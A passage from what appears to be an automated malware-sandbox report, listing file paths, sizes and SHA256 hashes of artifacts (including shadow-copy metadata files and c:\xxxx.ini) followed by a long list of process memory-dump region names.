                                              • SHA256 58b45d111326ebe96120a96df67c90e9e8b318fb863359fb4e20009a3cd12151
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              metadata-2

                                              • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                              • Size 24.1MB
                                              • SHA256 a1928d123de488ebc925266366c68922d57d0a0d445a6f33e7f8b72d438136c7
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              {4a40c020-1cd1-43c0-9125-826261cc5e15}_OnDiskSnapshotProp

                                              • Path \??\Volume{cd0aa2ae-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{4a40c020-1cd1-43c0-9125-826261cc5e15}_OnDiskSnapshotProp
                                              • Size 6KB
                                              • SHA256 ae1799938d9819bd9486cc2bdcee5a7f4285d5baa098955cf95458abca22d7de
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              xxxx.ini

                                              • Path \??\c:\xxxx.ini
                                              • Size 2B
                                              • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                              • MD5 SHA1 SHA512

                                              memory/408-243-0x00000000037F0000-0x0000000003FF7000-memory.dmp

                                              memory/408-242-0x0000000001180000-0x0000000001181000-memory.dmp

                                              memory/408-227-0x0000000075170000-0x00000000758BA000-memory.dmp

                                              memory/408-230-0x00000000037F0000-0x0000000003FF7000-memory.dmp

                                              memory/408-226-0x0000000001160000-0x0000000001161000-memory.dmp

                                              memory/408-249-0x0000000001160000-0x0000000001161000-memory.dmp

                                              memory/2864-38-0x00007FFE7BCA0000-0x00007FFE7BCB0000-memory.dmp

                                              memory/2864-16-0x00007FFE7BCA0000-0x00007FFE7BCB0000-memory.dmp

                                              memory/2864-12-0x00007FFE8AD70000-0x00007FFE8AD72000-memory.dmp

                                              memory/2864-13-0x00007FFE6BFB0000-0x00007FFE6C5DC000-memory.dmp

                                              memory/4232-55-0x00007FFE8AD70000-0x00007FFE8AD72000-memory.dmp

                                              memory/4232-76-0x000001EC883D0000-0x000001EC88C61000-memory.dmp

                                              memory/4232-90-0x000001EC883D0000-0x000001EC88C61000-memory.dmp

                                              memory/4232-80-0x000001EC88C70000-0x000001EC88CBE000-memory.dmp

                                              memory/4232-81-0x000001EC890A0000-0x000001EC8912A000-memory.dmp

                                              memory/4232-68-0x000001EC883D0000-0x000001EC88C61000-memory.dmp

                                              memory/4232-82-0x000001EC890A0000-0x000001EC8912A000-memory.dmp

                                              memory/4232-56-0x00007FFE6BD00000-0x00007FFE6C21E000-memory.dmp

                                              memory/4232-71-0x000001EC883D0000-0x000001EC88C61000-memory.dmp

                                              memory/4232-89-0x000001EC883D0000-0x000001EC88C61000-memory.dmp

                                              memory/4232-83-0x000001EC890A0000-0x000001EC8912A000-memory.dmp

                                              memory/4232-70-0x000001EC883D0000-0x000001EC88C61000-memory.dmp

                                              memory/4232-69-0x000001EC883D0000-0x000001EC88C61000-memory.dmp

                                              memory/4232-61-0x000001EC883D0000-0x000001EC88C61000-memory.dmp

                                              memory/4232-84-0x000001EC890A0000-0x000001EC8912A000-memory.dmp

                                              memory/4232-64-0x000001EC883D0000-0x000001EC88C61000-memory.dmp

                                              memory/4232-63-0x00007FFE8AD80000-0x00007FFE8AD82000-memory.dmp

                                              memory/4304-238-0x0000000003840000-0x0000000004047000-memory.dmp

                                              memory/4304-258-0x0000000001190000-0x0000000001191000-memory.dmp

                                              memory/4304-254-0x0000000003840000-0x0000000004047000-memory.dmp

                                              memory/4304-253-0x00000000011B0000-0x00000000011B1000-memory.dmp

                                              memory/4304-232-0x0000000001190000-0x0000000001191000-memory.dmp

                                              memory/4304-233-0x0000000073E10000-0x000000007455A000-memory.dmp

                                              memory/5056-181-0x0000000003250000-0x0000000003A57000-memory.dmp

                                              memory/5056-240-0x0000000003250000-0x0000000003A57000-memory.dmp

                                              memory/5056-217-0x0000000003250000-0x0000000003A57000-memory.dmp

                                              memory/5056-214-0x0000000010000000-0x0000000010061000-memory.dmp

                                              memory/5056-205-0x0000000003250000-0x0000000003A57000-memory.dmp

                                              memory/5056-192-0x00000000027D0000-0x00000000027E4000-memory.dmp

                                              memory/5056-180-0x0000000000A20000-0x0000000000A21000-memory.dmp

                                              memory/5056-185-0x0000000003250000-0x0000000003A57000-memory.dmp

                                              memory/5056-178-0x0000000003250000-0x0000000003A57000-memory.dmp

                                              memory/5056-173-0x00000000005F0000-0x00000000005F1000-memory.dmp

                                              memory/5056-174-0x0000000075170000-0x00000000758BA000-memory.dmp